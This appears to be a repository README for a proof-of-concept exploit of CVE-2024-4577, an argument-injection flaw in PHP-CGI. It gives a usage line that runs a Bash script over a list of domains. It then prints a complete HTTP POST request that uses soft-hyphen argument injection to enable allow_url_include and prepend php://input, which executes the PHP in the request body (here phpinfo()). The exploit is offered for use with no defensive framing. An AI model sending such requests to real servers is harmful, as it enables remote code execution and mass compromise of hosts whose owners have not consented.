/CVE-2024-4577

POC & $BASH script for CVE-2024-4577

Primary LanguageShell

CVE-2024-4577, Argument Injection in PHP-CGI

./CVE-2024-4577.sh /path/to/domains-list

POC :

POST /test.hello?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: {{host}}
User-Agent: curl/8.3.0
Accept: */*
Content-Length: 23
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive

<?php
phpinfo();
?>

448002152_980199013569536_7597209283143282849_n